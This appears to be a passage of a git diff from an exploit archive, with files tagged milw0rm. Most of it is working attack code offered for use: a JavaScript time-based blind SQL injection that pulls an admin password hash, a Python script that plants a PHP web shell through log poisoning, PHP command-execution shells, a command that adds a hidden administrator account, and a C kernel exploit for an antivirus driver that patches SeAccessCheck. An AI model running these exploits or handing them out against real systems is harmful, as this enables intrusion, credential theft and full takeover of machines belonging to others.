readNextChar(); + } + +function extractpassword() +{ + clearDisplay(); + var path = getPath(); + var basetime = 0; + var benchmark = 0; + var diff = 0; + var offset = 0; + var charset_len = charset_hash.length; + var resp = false; + loot = ''; + display_loot = false; + write("Extracting password.."); + write("Using path: " + path); + + resp = get(path); + if(!resp.success) { write("Failed to request page."); return; } + basetime = resp.miliseconds; + write("Normal request time set to " + basetime + " milisecond(s)"); + resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1"); + benchmark = resp.miliseconds; + write("Benchmark request time set to " + benchmark + " milisecond(s)"); + if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;} + write("Password:
    "); + display_loot = document.getElementById('loot'); + var retries = 0; + diff = benchmark - basetime; + if(diff <= 0) { alert("Failed to determine difference. Try again later"); showMenu(); return;} + var min = diff- (patience * 1000); + var best_match = 0; + var best = ''; + if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;} + function readNextChar() + { + var c = charset_hash[offset]; + display_loot.innerHTML = ''; + display_loot.innerHTML += loot + c; + + resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(password,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1"); + if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;} + var took = resp.miliseconds - basetime; + retries = 0; + if(took > 0 && took > best_match) {best_match = took; best = c;} + if(show_timing) + write(loot.length + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min); + if(took >= min) + { + loot += c; + display_loot.innerHTML = ''; + display_loot.innerHTML += loot; + offset = 0; + best = ''; best_match = 0; + } + else + offset++; + if(loot.length >= hash_max) + { + display_loot.innerHTML = ''; display_loot += loot; + loot_password = loot; + write('Back To Menu'); + alert("Admin Password Hash is \"" + loot + "\"\r\n(reached max length)"); + return; + } + if(offset < charset_len) + setTimeout(readNextChar, delay); + else + { + if(loot.length < hash_max) + { + loot += best; + best = ''; best_match = 0; + display_loot.innerHTML = ''; + display_loot.innerHTML += loot; + offset = 0; + setTimeout(readNextChar, delay); + return; + } + display_loot.innerHTML = ''; + display_loot.innerHTML += loot; + loot_password = loot; + write('Back To Menu'); + alert("Admin Password Hash is \"" + loot + "\""); + } + } + readNextChar(); + } + + +function 
createListItem(label, onclick, list) +{ + var li = document.createElement("LI"); + li.innerHTML = '' + label + ""; + list.appendChild(li); + +} + +createDisplay(); +showMenu(); + + +/** +* +* MD5 (Message-Digest Algorithm) +* http://www.webtoolkit.info/ +* +**/ + +var MD5 = function (string) { + + function RotateLeft(lValue, iShiftBits) { + return (lValue<>>(32-iShiftBits)); + } + + function AddUnsigned(lX,lY) { + var lX4,lY4,lX8,lY8,lResult; + lX8 = (lX & 0x80000000); + lY8 = (lY & 0x80000000); + lX4 = (lX & 0x40000000); + lY4 = (lY & 0x40000000); + lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF); + if (lX4 & lY4) { + return (lResult ^ 0x80000000 ^ lX8 ^ lY8); + } + if (lX4 | lY4) { + if (lResult & 0x40000000) { + return (lResult ^ 0xC0000000 ^ lX8 ^ lY8); + } else { + return (lResult ^ 0x40000000 ^ lX8 ^ lY8); + } + } else { + return (lResult ^ lX8 ^ lY8); + } + } + + function F(x,y,z) { return (x & y) | ((~x) & z); } + function G(x,y,z) { return (x & z) | (y & (~z)); } + function H(x,y,z) { return (x ^ y ^ z); } + function I(x,y,z) { return (y ^ (x | (~z))); } + + function FF(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function GG(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function HH(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function II(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function ConvertToWordArray(string) { + var lWordCount; + var lMessageLength = string.length; + var lNumberOfWords_temp1=lMessageLength + 8; + var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64; + var lNumberOfWords = (lNumberOfWords_temp2+1)*16; + var lWordArray=Array(lNumberOfWords-1); + 
var lBytePosition = 0; + var lByteCount = 0; + while ( lByteCount < lMessageLength ) { + lWordCount = (lByteCount-(lByteCount % 4))/4; + lBytePosition = (lByteCount % 4)*8; + lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<>>29; + return lWordArray; + }; + + function WordToHex(lValue) { + var WordToHexValue="",WordToHexValue_temp="",lByte,lCount; + for (lCount = 0;lCount<=3;lCount++) { + lByte = (lValue>>>(lCount*8)) & 255; + WordToHexValue_temp = "0" + lByte.toString(16); + WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2); + } + return WordToHexValue; + }; + + function Utf8Encode(string) { + string = string.replace(/\r\n/g,"\n"); + var utftext = ""; + + for (var n = 0; n < string.length; n++) { + + var c = string.charCodeAt(n); + + if (c < 128) { + utftext += String.fromCharCode(c); + } + else if((c > 127) && (c < 2048)) { + utftext += String.fromCharCode((c >> 6) | 192); + utftext += String.fromCharCode((c & 63) | 128); + } + else { + utftext += String.fromCharCode((c >> 12) | 224); + utftext += String.fromCharCode(((c >> 6) & 63) | 128); + utftext += String.fromCharCode((c & 63) | 128); + } + + } + + return utftext; + }; + + var x=Array(); + var k,AA,BB,CC,DD,a,b,c,d; + var S11=7, S12=12, S13=17, S14=22; + var S21=5, S22=9 , S23=14, S24=20; + var S31=4, S32=11, S33=16, S34=23; + var S41=6, S42=10, S43=15, S44=21; + + string = Utf8Encode(string); + + x = ConvertToWordArray(string); + + a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476; + + for (k=0;k )( Ex. 
include $_GET[file]; )\n\r" -shell=raw_input('Code : ') -user_agent={'User-Agent':'\');fclose($fp); ?>'} -conn=httplib.HTTPConnection(sys.argv[1],80) -conn.request("POST",'/' + sys.argv[2] + '/','',user_agent) -response=conn.getresponse().read() -urllib.urlopen('http://' + sys.argv[1] + '/' + sys.argv[2] + '/include/processor.php?content_path=../var/access_log') -print "\n\rShell created : http://" + sys.argv[1] + sys.argv[2] + "/var/sh.php\n\r" - -# milw0rm.com [2009-07-15] +#!usr/bin/python +##################################################################################### +#### Greenwood Content Manager Remote Code Execution #### +##################################################################################### +# # +#AUTHOR : Sina Yazdanmehr (R3d.W0rm) # +#Discovered by : Sina Yazdanmehr (R3d.W0rm) # +#Our Site : http://ircrash.com # +#My Official WebSite : http://r3dw0rm.ir # +#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Download : http://garr.dl.sourceforge.net/sourceforge/greenwood/greenwood-release-0.3.2.tar.bz2 +# # +#Dork : :( # +# # +##################################################################################### +# [Bug] # +# # +#http://[site]/[path]/include/processor.php?content_path=[evil_code_path] # +# # +###################################### TNX GOD ###################################### +import sys,httplib,urllib +if len(sys.argv) < 3 : + print "\n\rUsage : " + sys.argv[0] + " [site] [path]\n\r" + print "Ex : " + sys.argv[0] + " 123.com /greenwood/\n\r" + print "Powered by : Sina Yazdanmehr( R3d.W0rm )\n\r" + print "http://IrCrash.com - http://R3dW0rm.ir\n\r" + exit() +if 'http://' in sys.argv[1] : + sys.argv[1]=sys.argv[1].replace('http://','') +print "Input evil code.( With out ' and )( Ex. 
include $_GET[file]; )\n\r" +shell=raw_input('Code : ') +user_agent={'User-Agent':'\');fclose($fp); ?>'} +conn=httplib.HTTPConnection(sys.argv[1],80) +conn.request("POST",'/' + sys.argv[2] + '/','',user_agent) +response=conn.getresponse().read() +urllib.urlopen('http://' + sys.argv[1] + '/' + sys.argv[2] + '/include/processor.php?content_path=../var/access_log') +print "\n\rShell created : http://" + sys.argv[1] + sys.argv[2] + "/var/sh.php\n\r" + +# milw0rm.com [2009-07-15] diff --git a/platforms/php/webapps/9159.php b/platforms/php/webapps/9159.php index 6f88c6436..1df91b06a 100755 --- a/platforms/php/webapps/9159.php +++ b/platforms/php/webapps/9159.php @@ -1,95 +1,95 @@ - - -# milw0rm.com [2009-07-15] + + +# milw0rm.com [2009-07-15] diff --git a/platforms/php/webapps/9161.txt b/platforms/php/webapps/9161.txt index b2bf451d9..300719ce3 100755 --- a/platforms/php/webapps/9161.txt +++ b/platforms/php/webapps/9161.txt @@ -1,27 +1,27 @@ - - - - - -
    -
    -

    Admin News Tools Remote -Contents Change Vulnerability

    -
    - -

    - -

    -

    -
    -

    Just for Fun -

    -

    - -
    - - - -# milw0rm.com [2009-07-15] + + + + + +
    +
    +

    Admin News Tools Remote +Contents Change Vulnerability

    +
    +
    +

    + "; -$_GET['cmd']=htmlspecialchars($_GET['cmd']); -echo "
    CMD: " - -?> - -# milw0rm.com [2007-08-25] +"; +$perl->eval("system('".$_GET['cmd']."')"); +echo "</textarea>"; +$_GET['cmd']=htmlspecialchars($_GET['cmd']); +echo "
    CMD:
    " + +?> + +# milw0rm.com [2007-08-25] diff --git a/platforms/windows/local/4325.php b/platforms/windows/local/4325.php index d82b378cb..346bfa61a 100755 --- a/platforms/windows/local/4325.php +++ b/platforms/windows/local/4325.php @@ -27,7 +27,7 @@ if (isset($_GET['qrF'])) } elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administratoren own /add"); echo "User own -> full privileges successfully addet";exit;} echo ""; +echo "</textarea>"; while (false !== ($qQr = readdir($qQd))){ switch(filetype($qQa.$qQr)) diff --git a/platforms/windows/local/4345.c b/platforms/windows/local/4345.c index d1061b043..dff9ffd64 100755 --- a/platforms/windows/local/4345.c +++ b/platforms/windows/local/4345.c 
@@ -1,553 +1,553 @@ -/* - Norman Virus Control nvcoaft51.sys ioctl BF672028 exploit - - - Abstract - nvcoaft51.sys driver receive as parameter in some ioctl's - a pointer to a KEVENT struct, calling KeSetEvent without - any prior check. - The device created by the driver (NvcOa) can be opened by - any user. - As result, a user can send a IOCTL with a fake KEVENT - struct and finish executing code at ring0 - - Author - inocraM - inocram[at]48bits[dot]com - 48bits I+D team - www.48bits.com - - OS - Tested against Windows XP SP2 (spanish) with a PAE kernel. - - For educational purposes ONLY - -*/ - -#define _CRT_SECURE_NO_DEPRECATE -#include -#include - -#define XPLT_KEVENT_IOCTL 0xbf672028 - - -/* PSAPI */ -typedef BOOL (WINAPI * ENUM_DEVICE_DRIVERS)(LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded); -typedef DWORD (WINAPI * GET_DEVICE_DRIVER_BASE_NAME)(LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize); - -typedef struct _PS -{ - HMODULE hLib; - ENUM_DEVICE_DRIVERS pEnumDeviceDrivers; - GET_DEVICE_DRIVER_BASE_NAME pGetDeviceDriverBaseName; -}PS, *PPS; - - -VOID -psUnload(PPS pps) -{ - if(pps) - { - if(pps->hLib) - { - FreeLibrary(pps->hLib); - } - free(pps); - } -} - -PPS -psLoad() -{ - PPS pps; - - pps = (PPS) malloc(sizeof(PS)); - if(pps) - { - pps->hLib = LoadLibraryA("psapi"); - if(pps->hLib) - { - pps->pEnumDeviceDrivers = (ENUM_DEVICE_DRIVERS)GetProcAddress(pps->hLib, "EnumDeviceDrivers"); - pps->pGetDeviceDriverBaseName = (GET_DEVICE_DRIVER_BASE_NAME)GetProcAddress(pps->hLib,"GetDeviceDriverBaseNameA"); - if(!pps->pEnumDeviceDrivers || !pps->pGetDeviceDriverBaseName) - { - psUnload(pps); - pps = NULL; - } - } - else - { - free(pps); - pps = NULL; - } - } - return pps; -} - - -BOOL -psEnumDeviceDrivers(PPS pps, LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded) -{ - return pps->pEnumDeviceDrivers(lpImageBase, cb, lpcbNeeded); -} - -DWORD -psGetDeviceDriverBaseName(PPS pps, LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize) -{ - return 
pps->pGetDeviceDriverBaseName(ImageBase, lpBaseName, nSize); -} - -LPVOID -psGetImageBaseByBaseName(PPS pps, LPCSTR szName) -{ - DWORD dwSize = 0; - LPVOID *pDevices = NULL; - LPVOID pResult = NULL; - - if(psEnumDeviceDrivers(pps, NULL, 0, &dwSize) && (dwSize > 0)) - { - pDevices = (LPVOID*)malloc(dwSize); - if(pDevices) - { - if(psEnumDeviceDrivers(pps, pDevices, dwSize, &dwSize)) - { - DWORD i = 0; - DWORD dwNumberOfDrivers; - - dwNumberOfDrivers = dwSize / sizeof(LPVOID); - while((i < dwNumberOfDrivers) && (NULL == pResult)) - { - char szBaseName[MAX_PATH]; - - if(psGetDeviceDriverBaseName(pps, pDevices[i], szBaseName, sizeof(szBaseName))) - { - if(!_stricmp(szBaseName,szName)) - { - pResult = pDevices[i]; - } - } - i++; - } - } - free(pDevices); - } - } - return pResult; -} - -/* OS detection */ -#define OS_VERSION_UNKNOWN 0x00000000 -#define OS_VERSION_NT 0x00010000 -#define OS_VERSION_9X 0x00020000 -#define OS_VERSION_WIN32S 0x00030000 -#define OS_VERSION_NT4 OS_VERSION_NT + 0x00001000 -#define OS_VERSION_2K OS_VERSION_NT + 0x00002000 -#define OS_VERSION_XP OS_VERSION_NT + 0x00003000 -#define OS_VERSION_2K3 OS_VERSION_NT + 0x00004000 -#define OS_VERSION_VISTA OS_VERSION_NT + 0x00005000 -#define OS_VERSION_95 OS_VERSION_9X + 0x00001000 -#define OS_VERSION_98 OS_VERSION_9X + 0x00002000 -#define OS_VERSION_ME OS_VERSION_9X + 0x00003000 - - -DWORD -GetWindows9xVersion(POSVERSIONINFOEXA posvi) -{ - DWORD dwVersion; - - if(posvi->dwMajorVersion == 4) - { - switch(posvi->dwMinorVersion) - { - case 0: - dwVersion = OS_VERSION_95; - break; - case 10: - // TODO : we need extra code. 
this can be Windows ME - dwVersion = OS_VERSION_98; - break; - case 90: - dwVersion = OS_VERSION_ME; - break; - default: - dwVersion = OS_VERSION_UNKNOWN; - } - } - else - { - dwVersion = OS_VERSION_UNKNOWN; - } - return dwVersion; -} - - -DWORD -GetWindowsNtVersion(POSVERSIONINFOEXA posvi, PUINT pServicePack) -{ - DWORD dwVersion; - - switch(posvi->dwMajorVersion) - { - case 6: - dwVersion = OS_VERSION_VISTA; - break; - case 5: - switch(posvi->dwMinorVersion) - { - case 2: - dwVersion = OS_VERSION_2K3; - break; - case 1: - dwVersion = OS_VERSION_XP; - break; - case 0: - dwVersion = OS_VERSION_2K; - break; - default: - dwVersion = OS_VERSION_UNKNOWN; - } - break; - case 4: - case 3: - case 2: - case 1: - case 0: - dwVersion = OS_VERSION_NT4; - break; - default: - dwVersion = OS_VERSION_UNKNOWN; - } - - // TODO : dont work correctly in various windows Versions. fix it. - if((OS_VERSION_UNKNOWN != dwVersion) && (NULL != pServicePack)) - { - if(sizeof(OSVERSIONINFOEXA) == posvi->dwOSVersionInfoSize) - { - (*pServicePack) = posvi->wServicePackMajor; - } - else - { - // TODO : parse szCSDVersion - } - } - return dwVersion; -} - -// TODO : doesnt find correct SP for various windows versions, fix! 
-DWORD -GetWindowsVersionBase(PUINT pServicePack) -{ - OSVERSIONINFOEXA osvi; - DWORD dwVersion; - - if(pServicePack) - { - (*pServicePack) = 0; - } - memset(&osvi, 0, sizeof(OSVERSIONINFOEXA)); - osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXA); - if(FALSE == GetVersionExA((LPOSVERSIONINFOA)&osvi)) - { - osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); - if(!GetVersionExA((LPOSVERSIONINFOA)&osvi)) - { - return OS_VERSION_UNKNOWN; - } - } - switch(osvi.dwPlatformId) - { - case VER_PLATFORM_WIN32_NT: - dwVersion = GetWindowsNtVersion(&osvi, pServicePack); - break; - case VER_PLATFORM_WIN32_WINDOWS: - dwVersion = GetWindows9xVersion(&osvi); - break; - case VER_PLATFORM_WIN32s: - dwVersion = OS_VERSION_WIN32S; - break; - default: - dwVersion = OS_VERSION_UNKNOWN; - } - return dwVersion; -} - -DWORD -GetWindowsVersion(PUINT pServicePack) -{ - static BOOL bFirstCall = TRUE; - static DWORD OsVersion; - static UINT ServicePack; - - if(bFirstCall) - { - OsVersion = GetWindowsVersionBase(&ServicePack); - bFirstCall = FALSE; - } - if(pServicePack) - { - (*pServicePack) = ServicePack; - } - return OsVersion; -} - - - -HANDLE -OpenDevice(LPCSTR szDevice, DWORD dwDesiredAccess, DWORD dwShareMode) -{ - return CreateFileA(szDevice,dwDesiredAccess,dwShareMode,NULL,OPEN_EXISTING,0,NULL); -} - -VOID -CloseDevice(HANDLE hDevice) -{ - CloseHandle(hDevice); -} - - -BOOL -xpltCheckWindowsVersion() -{ - DWORD dwOsVersion; - BOOL bResult = FALSE; - UINT ServicePack; - - printf("(*)Checking OS Version...\n"); - dwOsVersion = GetWindowsVersion(&ServicePack); - if((OS_VERSION_XP == dwOsVersion) && (ServicePack == 2)) - { - printf("(+)Detected Windows XP SP2.\n"); - bResult = TRUE; - } - else - { - printf("(-)This exploit only runs on Windows XP SP2. 
Sorry.\n");
- }
- return bResult;
-}
-
-HANDLE
-xpltOpenNvc0a()
-{
- HANDLE hDevice;
-
- printf("(*)Opening NvcOa device...\n");
- hDevice = OpenDevice("\\\\.\\NvcOa", GENERIC_READ + GENERIC_WRITE, 0);
- if(INVALID_HANDLE_VALUE != hDevice)
- {
- printf("(+)Successfully opened NvcOa.\n");
- }
- else
- {
- printf("(-)Unable to open NvcOa. Sorry.\n");
- }
- return hDevice;
-}
-
-VOID
-xpltCloseNvc0a(HANDLE hDevice)
-{
- CloseDevice(hDevice);
- printf("(+)NvcOa device closed.\n");
-}
-
-PPS
-xpltInitializePsApi()
-{
- PPS pps;
- printf("(*)Loading PSAPI...\n");
- pps = psLoad();
- if(NULL != pps)
- {
- printf("(+)PSAPI loaded OK.\n");
- }
- else
- {
- printf("(-)Unable to load PSAPI. Sorry.\n");
- }
- return pps;
-}
-
-VOID
-xpltFreePsApi(PPS pps)
-{
- psUnload(pps);
- printf("(+)PSAPI Unloaded.\n");
-}
-
-
-LPBYTE
-xpltGetKernelBase(PPS pps, PBOOL pbPaeKernel)
-{
- LPBYTE pKernelBase;
-
- printf("(*)Looking for NTOSKRNL base...\n");
- (*pbPaeKernel) = FALSE;
- pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTOSKRNL.EXE");
- if(pKernelBase)
- {
- printf("(+)NTOSKRNL base found at %#x.\n",pKernelBase);
- }
- else
- {
- pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTKRNLPA.EXE");
- if(pKernelBase)
- {
- printf("(+)NTOSKRNL(PAE) base found at %#x.\n",pKernelBase);
- if(pbPaeKernel)
- {
- (*pbPaeKernel) = TRUE;
- }
- }
- else
- {
- printf("(-)Unable to find NTOSKRNL base. Sorry.\n");
- }
- }
- return pKernelBase;
-}
-
-
-/*
- when the ioctl with a fake event structure is sent
- a dword with the opcode "jmp[ecx]" is written and
- this code is reached.
- Be careful writing your own shellcode. Remember that
- u are at DPC level
-*/
-__declspec(naked)
-void
-xpltPatchAndGo (void)
-{
- __asm
- {
- add esp,4
- pop esi /* get a return addr to use as reference */
- mov dword ptr[esi-0x60], 0x8B047289 /* patch the jmp[ecx] with the correct code */
- mov word ptr[esi+0xE5303], 0x9090 /* patch SeAccessCheck :o) */
- mov esp, ebp /* reconstruct the stack */
- add esp, 0x10
- xor bl, bl /* set IRQL value */
- xor edi, edi /* set return value */
- sub esi, 0x759F
- push esi /* set retun address... */
- ret /* and go */
- }
-
-}
-
-VOID
-xpltExecuteExploit(HANDLE hDevice, PBYTE pNtosBase, BOOL bPaeKernel)
-{
-
-#ifdef _DEBUG
- DebugBreak();
-#endif
-
- if(!bPaeKernel)
- {
- printf("(-)This exploit is only runs on a PAE kernel system. Sorry.\n");
- }
- else
- {
- DWORD dwReturnedBytes;
- DWORD Buffer[1024]; /* user buffer size is not checked */
- /* properly so i use a big enough buffer */
- /* and i dont worry abaut it */
-
- DWORD Event[31]; /* our event struct */
-
- printf("(*)Trying to exploit the NvCoaft51 KeSetEvent vuln...\n");
- printf("(*)Writing fake event struct...\n");
-
- *(BYTE*)Event = 1; /* set event type as Synchronization Event */
-
- Event[2] = (DWORD)&(Event[3]); /* set event wait list as not empty so in */
- /* event[3] start the first wait block */
-
- Event[3] = (DWORD)&(Event[4]); /* set first element of the wait list */
- /* event[4] will be our wait block */
-
- ((WORD*)Event)[17] = 1; /* set the wait block type to WaitAny */
-
- Event[5] = (DWORD)&(Event[7]); /* set the trhead for the wait block, so */
- /* event[7] will be our thread start */
-
- Event[7] = (DWORD)xpltPatchAndGo; /* i put the shellcode addr on the first */
- /* dword of the thread. This value is not */
- /* checked by KeSetEvent related code, and */
- /* the event struct will remain referenced */
- /* by ecx,so writing a jmp[ecx] the */
- /* shellocde will be reached */
-
-
- Event[30] = (DWORD)&(Event[10]); /* fill thread wait block list with data */
- /* so in event[10] start this wait block. */
- /* First two dwords of the kwait block */
- /* struct are a list entry. system will */
- /* try to remove a item from this double */
- /* linked list, and as consecuence, we */
- /* can write an arbitrary dword at any */
- /* address */
-
-
- Event[10] = 0x000021FF; /* first entry will be a opcode, jmp[ecx] */
-
- Event[11] = (DWORD)(pNtosBase + 0x291B4); /* second entry will be the address of th */
- /* next opcode addr, and as result we will */
- /* jmp to our shellcode */
-
-
- Buffer[0] = (DWORD)(((PBYTE)(&Event)) - 0x84C); /* store our "event" in the ioctl buffer */
- /* and explit it :o) */
-
- printf("(*)Sending IOCTL...\n");
- DeviceIoControl(hDevice,XPLT_KEVENT_IOCTL,Buffer,sizeof(Buffer),Buffer,sizeof(Buffer),&dwReturnedBytes,NULL);
- printf("(+)IOCT sent. SeAccessCheck is now patched???\n");
- }
-}
-
-
-VOID
-xpltExecute()
-{
- if(xpltCheckWindowsVersion())
- {
- PPS pps;
-
- pps = xpltInitializePsApi();
- if(NULL != pps)
- {
- LPBYTE pKernelBase;
- BOOL bPaeKernel;
-
- pKernelBase = xpltGetKernelBase(pps,&bPaeKernel);
- if(NULL != pKernelBase)
- {
- HANDLE hDevice;
-
- hDevice = xpltOpenNvc0a();
- if(INVALID_HANDLE_VALUE != hDevice)
- {
- xpltExecuteExploit(hDevice, pKernelBase, bPaeKernel);
- xpltCloseNvc0a(hDevice);
- }
- }
- xpltFreePsApi(pps);
- }
- }
-}
-
-int main(int argc, char * argv[])
-{
- UNREFERENCED_PARAMETER(argc);
- UNREFERENCED_PARAMETER(argv);
-
-#ifdef _DEBUG
- DebugBreak();
-#endif
-
- xpltExecute();
- return 0;
-}
-
-// milw0rm.com [2007-08-30]
+/*
+ Norman Virus Control nvcoaft51.sys ioctl BF672028 exploit
+
+
+ Abstract
+ nvcoaft51.sys driver receive as parameter in some ioctl's
+ a pointer to a KEVENT struct, calling KeSetEvent without
+ any prior check.
+ The device created by the driver (NvcOa) can be opened by
+ any user.
+ As result, a user can send a IOCTL with a fake KEVENT
+ struct and finish executing code at ring0
+
+ Author
+ inocraM - inocram[at]48bits[dot]com
+ 48bits I+D team
+ www.48bits.com
+
+ OS
+ Tested against Windows XP SP2 (spanish) with a PAE kernel.
+
+ For educational purposes ONLY
+
+*/
+
+#define _CRT_SECURE_NO_DEPRECATE
+#include
+#include
+
+#define XPLT_KEVENT_IOCTL 0xbf672028
+
+
+/* PSAPI */
+typedef BOOL (WINAPI * ENUM_DEVICE_DRIVERS)(LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded);
+typedef DWORD (WINAPI * GET_DEVICE_DRIVER_BASE_NAME)(LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize);
+
+typedef struct _PS
+{
+ HMODULE hLib;
+ ENUM_DEVICE_DRIVERS pEnumDeviceDrivers;
+ GET_DEVICE_DRIVER_BASE_NAME pGetDeviceDriverBaseName;
+}PS, *PPS;
+
+
+VOID
+psUnload(PPS pps)
+{
+ if(pps)
+ {
+ if(pps->hLib)
+ {
+ FreeLibrary(pps->hLib);
+ }
+ free(pps);
+ }
+}
+
+PPS
+psLoad()
+{
+ PPS pps;
+
+ pps = (PPS) malloc(sizeof(PS));
+ if(pps)
+ {
+ pps->hLib = LoadLibraryA("psapi");
+ if(pps->hLib)
+ {
+ pps->pEnumDeviceDrivers = (ENUM_DEVICE_DRIVERS)GetProcAddress(pps->hLib, "EnumDeviceDrivers");
+ pps->pGetDeviceDriverBaseName = (GET_DEVICE_DRIVER_BASE_NAME)GetProcAddress(pps->hLib,"GetDeviceDriverBaseNameA");
+ if(!pps->pEnumDeviceDrivers || !pps->pGetDeviceDriverBaseName)
+ {
+ psUnload(pps);
+ pps = NULL;
+ }
+ }
+ else
+ {
+ free(pps);
+ pps = NULL;
+ }
+ }
+ return pps;
+}
+
+
+BOOL
+psEnumDeviceDrivers(PPS pps, LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded)
+{
+ return pps->pEnumDeviceDrivers(lpImageBase, cb, lpcbNeeded);
+}
+
+DWORD
+psGetDeviceDriverBaseName(PPS pps, LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize)
+{
+ return pps->pGetDeviceDriverBaseName(ImageBase, lpBaseName, nSize);
+}
+
+LPVOID
+psGetImageBaseByBaseName(PPS pps, LPCSTR szName)
+{
+ DWORD dwSize = 0;
+ LPVOID *pDevices = NULL;
+ LPVOID pResult = NULL;
+
+ if(psEnumDeviceDrivers(pps, NULL, 0, &dwSize) && (dwSize > 0))
+ {
+ pDevices = (LPVOID*)malloc(dwSize);
+ if(pDevices)
+ {
+ if(psEnumDeviceDrivers(pps, pDevices, dwSize, &dwSize))
+ {
+ DWORD i = 0;
+ DWORD dwNumberOfDrivers;
+
+ dwNumberOfDrivers = dwSize / sizeof(LPVOID);
+ while((i < dwNumberOfDrivers) && (NULL == pResult))
+ {
+ char szBaseName[MAX_PATH];
+
+ if(psGetDeviceDriverBaseName(pps, pDevices[i], szBaseName, sizeof(szBaseName)))
+ {
+ if(!_stricmp(szBaseName,szName))
+ {
+ pResult = pDevices[i];
+ }
+ }
+ i++;
+ }
+ }
+ free(pDevices);
+ }
+ }
+ return pResult;
+}
+
+/* OS detection */
+#define OS_VERSION_UNKNOWN 0x00000000
+#define OS_VERSION_NT 0x00010000
+#define OS_VERSION_9X 0x00020000
+#define OS_VERSION_WIN32S 0x00030000
+#define OS_VERSION_NT4 OS_VERSION_NT + 0x00001000
+#define OS_VERSION_2K OS_VERSION_NT + 0x00002000
+#define OS_VERSION_XP OS_VERSION_NT + 0x00003000
+#define OS_VERSION_2K3 OS_VERSION_NT + 0x00004000
+#define OS_VERSION_VISTA OS_VERSION_NT + 0x00005000
+#define OS_VERSION_95 OS_VERSION_9X + 0x00001000
+#define OS_VERSION_98 OS_VERSION_9X + 0x00002000
+#define OS_VERSION_ME OS_VERSION_9X + 0x00003000
+
+
+DWORD
+GetWindows9xVersion(POSVERSIONINFOEXA posvi)
+{
+ DWORD dwVersion;
+
+ if(posvi->dwMajorVersion == 4)
+ {
+ switch(posvi->dwMinorVersion)
+ {
+ case 0:
+ dwVersion = OS_VERSION_95;
+ break;
+ case 10:
+ // TODO : we need extra code. this can be Windows ME
+ dwVersion = OS_VERSION_98;
+ break;
+ case 90:
+ dwVersion = OS_VERSION_ME;
+ break;
+ default:
+ dwVersion = OS_VERSION_UNKNOWN;
+ }
+ }
+ else
+ {
+ dwVersion = OS_VERSION_UNKNOWN;
+ }
+ return dwVersion;
+}
+
+
+DWORD
+GetWindowsNtVersion(POSVERSIONINFOEXA posvi, PUINT pServicePack)
+{
+ DWORD dwVersion;
+
+ switch(posvi->dwMajorVersion)
+ {
+ case 6:
+ dwVersion = OS_VERSION_VISTA;
+ break;
+ case 5:
+ switch(posvi->dwMinorVersion)
+ {
+ case 2:
+ dwVersion = OS_VERSION_2K3;
+ break;
+ case 1:
+ dwVersion = OS_VERSION_XP;
+ break;
+ case 0:
+ dwVersion = OS_VERSION_2K;
+ break;
+ default:
+ dwVersion = OS_VERSION_UNKNOWN;
+ }
+ break;
+ case 4:
+ case 3:
+ case 2:
+ case 1:
+ case 0:
+ dwVersion = OS_VERSION_NT4;
+ break;
+ default:
+ dwVersion = OS_VERSION_UNKNOWN;
+ }
+
+ // TODO : dont work correctly in various windows Versions. fix it.
+
+ if((OS_VERSION_UNKNOWN != dwVersion) && (NULL != pServicePack))
+ {
+ if(sizeof(OSVERSIONINFOEXA) == posvi->dwOSVersionInfoSize)
+ {
+ (*pServicePack) = posvi->wServicePackMajor;
+ }
+ else
+ {
+ // TODO : parse szCSDVersion
+ }
+ }
+ return dwVersion;
+}
+
+// TODO : doesnt find correct SP for various windows versions, fix!
+DWORD
+GetWindowsVersionBase(PUINT pServicePack)
+{
+ OSVERSIONINFOEXA osvi;
+ DWORD dwVersion;
+
+ if(pServicePack)
+ {
+ (*pServicePack) = 0;
+ }
+ memset(&osvi, 0, sizeof(OSVERSIONINFOEXA));
+ osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXA);
+ if(FALSE == GetVersionExA((LPOSVERSIONINFOA)&osvi))
+ {
+ osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
